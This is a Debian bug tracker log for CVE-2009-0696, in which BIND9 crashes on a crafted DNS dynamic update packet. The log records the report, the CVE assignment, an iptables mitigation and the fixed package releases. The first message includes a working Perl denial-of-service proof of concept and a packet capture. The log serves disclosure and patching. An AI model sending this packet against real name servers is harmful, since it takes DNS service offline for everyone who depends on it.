Debian Bug report logs - #538975
bind9 dies with assertion failure (db.c:579)

version graph

Package: bind9; Maintainer for bind9 is LaMont Jones <lamont@debian.org>; Source for bind9 is src:bind9.

Reported by: Micha Krause <debianbugs@noris.net>

Date: Tue, 28 Jul 2009 09:30:02 UTC

Severity: serious

Tags: security

Fixed in versions bind9/1:9.6.1.dfsg.P1-1, bind9/1:9.5.1.dfsg.P3-1

Done: LaMont Jones <lamont@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9. (Tue, 28 Jul 2009 09:30:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Micha Krause <debianbugs@noris.net>:
New Bug report received and forwarded. Copy sent to LaMont Jones <lamont@debian.org>. (Tue, 28 Jul 2009 09:30:05 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Micha Krause <debianbugs@noris.net>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: bind9 dies with assertion failure (db.c:579)
Date: Tue, 28 Jul 2009 11:29:17 +0200
Package: bind9
Severity: normal


bind can be crashed with an update packet:

Packet in tcpdump:

15:38:11.676045 IP (tos 0x0, ttl  64, id 0, offset 0, flags [DF], proto: UDP (17), length: 178) 10.2.0.205.59447 > 10.2.0.205.53:  17378 update [1a] [1n] [1au] SOA? 8.0.10.in-addr.arpa. 8.8.0.10.in-addr.arpa. ANY ns: [|domain]

Another view of the Packet:

| ;; HEADER SECTION
| ;; id = 181
| ;; qr = 0    opcode = UPDATE    rcode = NOERROR
| ;; zocount = 1  prcount = 1  upcount = 1  adcount = 1
|
| ;; ZONE SECTION (1 record)
| ;; 8.0.10.in-addr.arpa.       IN      SOA
|
| ;; PREREQUISITE SECTION (1 record)
| 4.8.0.10.in-addr.arpa.        0       IN      ANY     ; no data
|
| ;; UPDATE SECTION (1 record)
| 4.8.0.10.in-addr.arpa.        0       ANY     ANY     ; no data
|
| ;; ADDITIONAL SECTION (1 record)
| office.example.com.        0       ANY     TSIG    HMAC-MD5.SIG-ALG.REG.INT. NOERROR


Such a packet can be created with perl:

-----------------

#!/usr/bin/perl -w

use Net::DNS;

our $NSI = '<dns server>';
our $NSI_KEY_NAME = '<key name>';
our $NSI_KEY = '<key>';


my $rzone = '<zone>';
my $rptr  = "1.$rzone";

my $packet = Net::DNS::Update->new($rzone);

$packet->push(
    pre => Net::DNS::RR->new(
        Name  => $rptr,
        Class => 'IN',
        Type  => 'ANY',
        TTL   => 0,
    )
);
$packet->push(
    update => Net::DNS::RR->new(
        Name  => $rptr,
        Class => 'ANY',
        Type  => 'ANY',
    )
);

$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;


print $packet->string;

Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);

--------------------


bind only crashes, if the used fqdn exists on the nameserver.


-- System Information:
Debian Release: 5.0.2
  APT prefers proposed-updates
  APT policy: (500, 'proposed-updates'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-xen-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash




Added tag(s) security. Request was from Matthias Urlichs <smurf@smurf.noris.de> to control@bugs.debian.org. (Tue, 28 Jul 2009 12:33:13 GMT) Full text and rfc822 format available.

Severity set to 'serious' from 'normal' Request was from Matthias Urlichs <smurf@smurf.noris.de> to control@bugs.debian.org. (Tue, 28 Jul 2009 12:33:14 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9. (Tue, 28 Jul 2009 20:12:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Thijs Kinkhorst <thijs@debian.org>:
Extra info received and forwarded to list. Copy sent to LaMont Jones <lamont@debian.org>. (Tue, 28 Jul 2009 20:12:07 GMT) Full text and rfc822 format available.

Message #14 received at 538975@bugs.debian.org (full text, mbox):

From: Thijs Kinkhorst <thijs@debian.org>
To: 538975@bugs.debian.org
Subject: CVE name assigned
Date: Tue, 28 Jul 2009 22:05:44 +0200
[Message part 1 (text/plain, inline)]
This is CVE-2009-0696 and CERT VU#725188.
Please reference them in any relevant changelogs.
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9. (Wed, 29 Jul 2009 00:36:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael Holzt <debian-bugreports@michael.holzt.de>:
Extra info received and forwarded to list. Copy sent to LaMont Jones <lamont@debian.org>. (Wed, 29 Jul 2009 00:36:02 GMT) Full text and rfc822 format available.

Message #19 received at 538975@bugs.debian.org (full text, mbox):

From: Michael Holzt <debian-bugreports@michael.holzt.de>
To: 538975@bugs.debian.org
Subject: Quick fix with iptables
Date: Wed, 29 Jul 2009 02:31:48 +0200
As a hint for other sysadmins:

For the time until a fixed debian package is available, this iptables rule
should filter all dnsupdate packets, thus mitigating the attack:

| iptables -A INPUT -p udp --dport 53 -j DROP -m u32 --u32 '30>>27&0xF=5'

Works for me, but no guaranty. I have added a second rule which logs
said dnsupdate packets and i already got several such packets from the
outside world, so the exploit is clearly in active use and the least you 
can do is to try the iptables rule.


Regards
Michael

-- 
It's an insane world, but i'm proud to be a part of it. -- Bill Hicks




Reply sent to LaMont Jones <lamont@debian.org>:
You have taken responsibility. (Wed, 29 Jul 2009 05:15:08 GMT) Full text and rfc822 format available.

Notification sent to Micha Krause <debianbugs@noris.net>:
Bug acknowledged by developer. (Wed, 29 Jul 2009 05:15:08 GMT) Full text and rfc822 format available.

Message #24 received at 538975-close@bugs.debian.org (full text, mbox):

From: LaMont Jones <lamont@debian.org>
To: 538975-close@bugs.debian.org
Subject: Bug#538975: fixed in bind9 1:9.6.1.dfsg.P1-1
Date: Wed, 29 Jul 2009 04:47:11 +0000
Source: bind9
Source-Version: 1:9.6.1.dfsg.P1-1

We believe that the bug you reported is fixed in the latest version of
bind9, which is due to be installed in the Debian FTP archive:

bind9-doc_9.6.1.dfsg.P1-1_all.deb
  to pool/main/b/bind9/bind9-doc_9.6.1.dfsg.P1-1_all.deb
bind9-host_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/bind9-host_9.6.1.dfsg.P1-1_amd64.deb
bind9_9.6.1.dfsg.P1-1.diff.gz
  to pool/main/b/bind9/bind9_9.6.1.dfsg.P1-1.diff.gz
bind9_9.6.1.dfsg.P1-1.dsc
  to pool/main/b/bind9/bind9_9.6.1.dfsg.P1-1.dsc
bind9_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/bind9_9.6.1.dfsg.P1-1_amd64.deb
bind9_9.6.1.dfsg.P1.orig.tar.gz
  to pool/main/b/bind9/bind9_9.6.1.dfsg.P1.orig.tar.gz
bind9utils_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/bind9utils_9.6.1.dfsg.P1-1_amd64.deb
dnsutils_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/dnsutils_9.6.1.dfsg.P1-1_amd64.deb
libbind-dev_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/libbind-dev_9.6.1.dfsg.P1-1_amd64.deb
libbind9-50_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/libbind9-50_9.6.1.dfsg.P1-1_amd64.deb
libdns50_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/libdns50_9.6.1.dfsg.P1-1_amd64.deb
libisc50_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/libisc50_9.6.1.dfsg.P1-1_amd64.deb
libisccc50_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/libisccc50_9.6.1.dfsg.P1-1_amd64.deb
libisccfg50_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/libisccfg50_9.6.1.dfsg.P1-1_amd64.deb
liblwres50_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/liblwres50_9.6.1.dfsg.P1-1_amd64.deb
lwresd_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/lwresd_9.6.1.dfsg.P1-1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 538975@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
LaMont Jones <lamont@debian.org> (supplier of updated bind9 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Tue, 28 Jul 2009 22:03:14 -0600
Source: bind9
Binary: bind9 bind9utils bind9-doc bind9-host libbind-dev libbind9-50 libdns50 libisc50 liblwres50 libisccc50 libisccfg50 dnsutils lwresd
Architecture: all amd64 source 
Version: 1:9.6.1.dfsg.P1-1
Distribution: unstable
Urgency: low
Maintainer: LaMont Jones <lamont@debian.org>
Changed-By: LaMont Jones <lamont@debian.org>
Description: 
 bind9      - Internet Domain Name Server
 bind9-doc  - Documentation for BIND
 bind9-host - Version of 'host' bundled with BIND 9.X
 bind9utils - Utilities for BIND
 dnsutils   - Clients provided with BIND
 libbind-dev - Static Libraries and Headers used by BIND
 libbind9-50 - BIND9 Shared Library used by BIND
 libdns50   - DNS Shared Library used by BIND
 libisc50   - ISC Shared Library used by BIND
 libisccc50 - Command Channel Library used by BIND
 libisccfg50 - Config File Handling Library used by BIND
 liblwres50 - Lightweight Resolver Library used by BIND
 lwresd     - Lightweight Resolver Daemon
Closes: 492308 527137 536487 538975
Changes: 
 bind9 (1:9.6.1.dfsg.P1-1) unstable; urgency=low
 .
   [Internet Software Consortium, Inc]
 .
   * A specially crafted update packet will cause named to exit.
     CVE-2009-0696, CERT VU#725188.  Closes: #538975
 .
   [InterNIC]
 .
   * Update db.root hints file.
 .
   [LaMont Jones]
 .
   * Move default zone definitions from named.conf to named.conf.default-zones.
      Closes: #492308
   * use start-stop-daemon if rndc stop fails.  Closes: #536487
   * lwresd: pidfile name was wrong in init script.  Closes: #527137
Files: 
 164a8f8147ded4bbf4b0e9328f124e9f 5111118 net optional bind9_9.6.1.dfsg.P1.orig.tar.gz
 43c35f13590aba2954e4610c7a02ab13 155178 net standard dnsutils_9.6.1.dfsg.P1-1_amd64.deb
 527b68876b5d4595a79f9dccc549b0ba 48274 libs standard liblwres50_9.6.1.dfsg.P1-1_amd64.deb
 59df9766351050f85e07c6d0726a3d2c 64734 net standard bind9-host_9.6.1.dfsg.P1-1_amd64.deb
 63fff5293fdb68822b6309ca619db8ec 223042 net optional lwresd_9.6.1.dfsg.P1-1_amd64.deb
 72d57c6ccc10a4cb6787450af7181759 287206 net optional bind9_9.6.1.dfsg.P1-1_amd64.deb
 7b2c88cfdba22e7bac5a91e070371f61 32372 libs standard libbind9-50_9.6.1.dfsg.P1-1_amd64.deb
 800a0a5ae07445bd4a7259c747feeeab 29062 libs optional libisccc50_9.6.1.dfsg.P1-1_amd64.deb
 80292d564e28c966e5700846edc233f9 167044 libs standard libisc50_9.6.1.dfsg.P1-1_amd64.deb
 a1aec096f32ea6ec12319182c2e8b235 100246 net optional bind9utils_9.6.1.dfsg.P1-1_amd64.deb
 acd155f197737a2566897c6fd1ffa7a2 1403022 libdevel optional libbind-dev_9.6.1.dfsg.P1-1_amd64.deb
 74243684fd7b5a713e63baf068cfaf3d 1083 net optional bind9_9.6.1.dfsg.P1-1.dsc
 bb587214860aacca9df33121d5ff41a1 219593 net optional bind9_9.6.1.dfsg.P1-1.diff.gz
 c4e0a3b5cc3e9ee37f04f951a9d4a2c0 51146 libs optional libisccfg50_9.6.1.dfsg.P1-1_amd64.deb
 ce7783dc0f2f7b02c35deb8e2b2cf731 280618 doc optional bind9-doc_9.6.1.dfsg.P1-1_all.deb
 e34ac089d6e1236532e77024e3564761 653592 libs standard libdns50_9.6.1.dfsg.P1-1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFKb84lzN/kmwoKyScRAtLgAJ9oeGH3WEVMgiSlrNISFHK2SUeuaQCeKs/g
fueONBapV0I1fCnLD0AEe0w=
=7Pf7
-----END PGP SIGNATURE-----





Added tag(s) pending. Request was from LaMont Jones <lamont@debian.org> to control@bugs.debian.org. (Wed, 29 Jul 2009 05:36:02 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9. (Wed, 29 Jul 2009 19:03:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Yuriy Kolesnikov <yurikoles@gmail.com>:
Extra info received and forwarded to list. Copy sent to LaMont Jones <lamont@debian.org>. (Wed, 29 Jul 2009 19:03:02 GMT) Full text and rfc822 format available.

Message #31 received at 538975@bugs.debian.org (full text, mbox):

From: Yuriy Kolesnikov <yurikoles@gmail.com>
To: 538975@bugs.debian.org
Subject: Testing
Date: Wed, 29 Jul 2009 21:59:14 +0300
[Message part 1 (text/plain, inline)]
How to install update in testing? I uncommenteddeb
http://security.debian.org/debian/ stable/updates main contrib non-free
But there is no update!
[Message part 2 (text/html, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9. (Wed, 29 Jul 2009 19:27:09 GMT) Full text and rfc822 format available.

Acknowledgement sent to Ondřej Surý <ondrej@sury.org>:
Extra info received and forwarded to list. Copy sent to LaMont Jones <lamont@debian.org>. (Wed, 29 Jul 2009 19:27:09 GMT) Full text and rfc822 format available.

Message #36 received at 538975@bugs.debian.org (full text, mbox):

From: Ondřej Surý <ondrej@sury.org>
To: Yuriy Kolesnikov <yurikoles@gmail.com>, 538975@bugs.debian.org
Subject: Re: Bug#538975: Testing
Date: Wed, 29 Jul 2009 19:24:34 +0000
If you use testing, for sure, you know about:

http://lists.debian.org/debian-testing-security-announce/2008/12/msg00019.html

Ondrej

On Wed, Jul 29, 2009 at 18:59, Yuriy Kolesnikov<yurikoles@gmail.com> wrote:
> How to install update in testing? I uncommented
> deb http://security.debian.org/debian/ stable/updates main contrib non-free
> But there is no update!



-- 
Ondřej Surý <ondrej@sury.org>
http://blog.rfc1925.org/




Reply sent to LaMont Jones <lamont@debian.org>:
You have taken responsibility. (Sun, 02 Aug 2009 20:45:07 GMT) Full text and rfc822 format available.

Notification sent to Micha Krause <debianbugs@noris.net>:
Bug acknowledged by developer. (Sun, 02 Aug 2009 20:45:08 GMT) Full text and rfc822 format available.

Message #41 received at 538975-close@bugs.debian.org (full text, mbox):

From: LaMont Jones <lamont@debian.org>
To: 538975-close@bugs.debian.org
Subject: Bug#538975: fixed in bind9 1:9.5.1.dfsg.P3-1
Date: Sun, 02 Aug 2009 20:28:31 +0000
Source: bind9
Source-Version: 1:9.5.1.dfsg.P3-1

We believe that the bug you reported is fixed in the latest version of
bind9, which is due to be installed in the Debian FTP archive:

bind9-doc_9.5.1.dfsg.P3-1_all.deb
  to pool/main/b/bind9/bind9-doc_9.5.1.dfsg.P3-1_all.deb
bind9-host_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/bind9-host_9.5.1.dfsg.P3-1_amd64.deb
bind9_9.5.1.dfsg.P3-1.diff.gz
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.diff.gz
bind9_9.5.1.dfsg.P3-1.dsc
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.dsc
bind9_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1_amd64.deb
bind9_9.5.1.dfsg.P3.orig.tar.gz
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3.orig.tar.gz
bind9utils_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/bind9utils_9.5.1.dfsg.P3-1_amd64.deb
dnsutils_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/dnsutils_9.5.1.dfsg.P3-1_amd64.deb
libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
libdns45_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libdns45_9.5.1.dfsg.P3-1_amd64.deb
libisc45_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libisc45_9.5.1.dfsg.P3-1_amd64.deb
libisccc40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libisccc40_9.5.1.dfsg.P3-1_amd64.deb
libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
liblwres40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/liblwres40_9.5.1.dfsg.P3-1_amd64.deb
lwresd_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/lwresd_9.5.1.dfsg.P3-1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 538975@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
LaMont Jones <lamont@debian.org> (supplier of updated bind9 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Tue, 28 Jul 2009 22:48:28 -0600
Source: bind9
Binary: bind9 bind9utils bind9-doc bind9-host libbind-dev libbind9-40 libdns45 libisc45 liblwres40 libisccc40 libisccfg40 dnsutils lwresd
Architecture: all amd64 source 
Version: 1:9.5.1.dfsg.P3-1
Distribution: stable-security
Urgency: low
Maintainer: LaMont Jones <lamont@debian.org>
Changed-By: LaMont Jones <lamont@debian.org>
Description: 
 bind9      - Internet Domain Name Server
 bind9-doc  - Documentation for BIND
 bind9-host - Version of 'host' bundled with BIND 9.X
 bind9utils - Utilities for BIND
 dnsutils   - Clients provided with BIND
 libbind-dev - Static Libraries and Headers used by BIND
 libbind9-40 - BIND9 Shared Library used by BIND
 libdns45   - DNS Shared Library used by BIND
 libisc45   - ISC Shared Library used by BIND
 libisccc40 - Command Channel Library used by BIND
 libisccfg40 - Config File Handling Library used by BIND
 liblwres40 - Lightweight Resolver Library used by BIND
 lwresd     - Lightweight Resolver Daemon
Closes: 538975
Changes: 
 bind9 (1:9.5.1.dfsg.P3-1) stable-security; urgency=low
 .
   [Internet Software Consortium, Inc]
 .
   * A specially crafted update packet will cause named to exit.
     CVE-2009-0696, CERT VU#725188.  Closes: #538975
Files: 
 358d0cdea486df897666661d78b7a8e5 601910 libs standard libdns45_9.5.1.dfsg.P3-1_amd64.deb
 410430ff014240042b527bfe607621c1 64394 net standard bind9-host_9.5.1.dfsg.P3-1_amd64.deb
 5d086997e4b13abb6bea5ad3c1920f08 1332918 libdevel optional libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
 6315afa492be63b377fe44126ae82b1b 50634 libs standard libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
 684dcaa493c32e3596b3685c26f173aa 154944 net standard dnsutils_9.5.1.dfsg.P3-1_amd64.deb
 82679c58157e3aead368abb56dd39aa3 31816 libs standard libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
 8e109829ee1dd553cf4799cd9af7ef2f 1049 net optional bind9_9.5.1.dfsg.P3-1.dsc
 9e7a5a67b9c681e836bd0bfa0b779004 163698 libs standard libisc45_9.5.1.dfsg.P3-1_amd64.deb
 ab42f6daa6d079035ef6a16eb644dabf 212176 net optional lwresd_9.5.1.dfsg.P3-1_amd64.deb
 bc456e91b46eab565438222f0b6e97d2 264860 doc optional bind9-doc_9.5.1.dfsg.P3-1_all.deb
 c878e3c0edb31dca8e74b42a0fa06efc 224291 net optional bind9_9.5.1.dfsg.P3-1.diff.gz
 d94a961e42289f1b1978f2b66add6dec 28820 libs standard libisccc40_9.5.1.dfsg.P3-1_amd64.deb
 dc87f5d14403bee19b0c1d04b4de9252 5221004 net optional bind9_9.5.1.dfsg.P3.orig.tar.gz
 df3664fb075f561d9b519a5517154b14 97132 net optional bind9utils_9.5.1.dfsg.P3-1_amd64.deb
 e193057861c47e3fad50884ffd8a5d5c 48110 libs standard liblwres40_9.5.1.dfsg.P3-1_amd64.deb
 f3fd746ba24e74230cba606b0a5f61ea 255048 net optional bind9_9.5.1.dfsg.P3-1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFKb+DbzN/kmwoKyScRAtLaAJ4tTc8UsPadqLdtMwcWFuKJa4T2dQCfQ9OX
0gCyOrrhUy9K5OoHTAqIScM=
=9vlB
-----END PGP SIGNATURE-----





Reply sent to LaMont Jones <lamont@debian.org>:
You have taken responsibility. (Fri, 04 Sep 2009 19:15:35 GMT) Full text and rfc822 format available.

Notification sent to Micha Krause <debianbugs@noris.net>:
Bug acknowledged by developer. (Fri, 04 Sep 2009 19:15:35 GMT) Full text and rfc822 format available.

Message #46 received at 538975-close@bugs.debian.org (full text, mbox):

From: LaMont Jones <lamont@debian.org>
To: 538975-close@bugs.debian.org
Subject: Bug#538975: fixed in bind9 1:9.5.1.dfsg.P3-1
Date: Fri, 04 Sep 2009 18:31:44 +0000
Source: bind9
Source-Version: 1:9.5.1.dfsg.P3-1

We believe that the bug you reported is fixed in the latest version of
bind9, which is due to be installed in the Debian FTP archive:

bind9-doc_9.5.1.dfsg.P3-1_all.deb
  to pool/main/b/bind9/bind9-doc_9.5.1.dfsg.P3-1_all.deb
bind9-host_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/bind9-host_9.5.1.dfsg.P3-1_amd64.deb
bind9_9.5.1.dfsg.P3-1.diff.gz
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.diff.gz
bind9_9.5.1.dfsg.P3-1.dsc
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.dsc
bind9_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1_amd64.deb
bind9_9.5.1.dfsg.P3.orig.tar.gz
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3.orig.tar.gz
bind9utils_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/bind9utils_9.5.1.dfsg.P3-1_amd64.deb
dnsutils_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/dnsutils_9.5.1.dfsg.P3-1_amd64.deb
libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
libdns45_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libdns45_9.5.1.dfsg.P3-1_amd64.deb
libisc45_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libisc45_9.5.1.dfsg.P3-1_amd64.deb
libisccc40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libisccc40_9.5.1.dfsg.P3-1_amd64.deb
libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
liblwres40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/liblwres40_9.5.1.dfsg.P3-1_amd64.deb
lwresd_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/lwresd_9.5.1.dfsg.P3-1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 538975@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
LaMont Jones <lamont@debian.org> (supplier of updated bind9 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Tue, 28 Jul 2009 22:48:28 -0600
Source: bind9
Binary: bind9 bind9utils bind9-doc bind9-host libbind-dev libbind9-40 libdns45 libisc45 liblwres40 libisccc40 libisccfg40 dnsutils lwresd
Architecture: all amd64 source 
Version: 1:9.5.1.dfsg.P3-1
Distribution: stable-security
Urgency: low
Maintainer: LaMont Jones <lamont@debian.org>
Changed-By: LaMont Jones <lamont@debian.org>
Description: 
 bind9      - Internet Domain Name Server
 bind9-doc  - Documentation for BIND
 bind9-host - Version of 'host' bundled with BIND 9.X
 bind9utils - Utilities for BIND
 dnsutils   - Clients provided with BIND
 libbind-dev - Static Libraries and Headers used by BIND
 libbind9-40 - BIND9 Shared Library used by BIND
 libdns45   - DNS Shared Library used by BIND
 libisc45   - ISC Shared Library used by BIND
 libisccc40 - Command Channel Library used by BIND
 libisccfg40 - Config File Handling Library used by BIND
 liblwres40 - Lightweight Resolver Library used by BIND
 lwresd     - Lightweight Resolver Daemon
Closes: 538975
Changes: 
 bind9 (1:9.5.1.dfsg.P3-1) stable-security; urgency=low
 .
   [Internet Software Consortium, Inc]
 .
   * A specially crafted update packet will cause named to exit.
     CVE-2009-0696, CERT VU#725188.  Closes: #538975
Files: 
 358d0cdea486df897666661d78b7a8e5 601910 libs standard libdns45_9.5.1.dfsg.P3-1_amd64.deb
 410430ff014240042b527bfe607621c1 64394 net standard bind9-host_9.5.1.dfsg.P3-1_amd64.deb
 5d086997e4b13abb6bea5ad3c1920f08 1332918 libdevel optional libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
 6315afa492be63b377fe44126ae82b1b 50634 libs standard libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
 684dcaa493c32e3596b3685c26f173aa 154944 net standard dnsutils_9.5.1.dfsg.P3-1_amd64.deb
 82679c58157e3aead368abb56dd39aa3 31816 libs standard libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
 8e109829ee1dd553cf4799cd9af7ef2f 1049 net optional bind9_9.5.1.dfsg.P3-1.dsc
 9e7a5a67b9c681e836bd0bfa0b779004 163698 libs standard libisc45_9.5.1.dfsg.P3-1_amd64.deb
 ab42f6daa6d079035ef6a16eb644dabf 212176 net optional lwresd_9.5.1.dfsg.P3-1_amd64.deb
 bc456e91b46eab565438222f0b6e97d2 264860 doc optional bind9-doc_9.5.1.dfsg.P3-1_all.deb
 c878e3c0edb31dca8e74b42a0fa06efc 224291 net optional bind9_9.5.1.dfsg.P3-1.diff.gz
 d94a961e42289f1b1978f2b66add6dec 28820 libs standard libisccc40_9.5.1.dfsg.P3-1_amd64.deb
 dc87f5d14403bee19b0c1d04b4de9252 5221004 net optional bind9_9.5.1.dfsg.P3.orig.tar.gz
 df3664fb075f561d9b519a5517154b14 97132 net optional bind9utils_9.5.1.dfsg.P3-1_amd64.deb
 e193057861c47e3fad50884ffd8a5d5c 48110 libs standard liblwres40_9.5.1.dfsg.P3-1_amd64.deb
 f3fd746ba24e74230cba606b0a5f61ea 255048 net optional bind9_9.5.1.dfsg.P3-1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFKb+DbzN/kmwoKyScRAtLaAJ4tTc8UsPadqLdtMwcWFuKJa4T2dQCfQ9OX
0gCyOrrhUy9K5OoHTAqIScM=
=9vlB
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sat, 03 Oct 2009 07:44:55 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 16 08:37:01 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.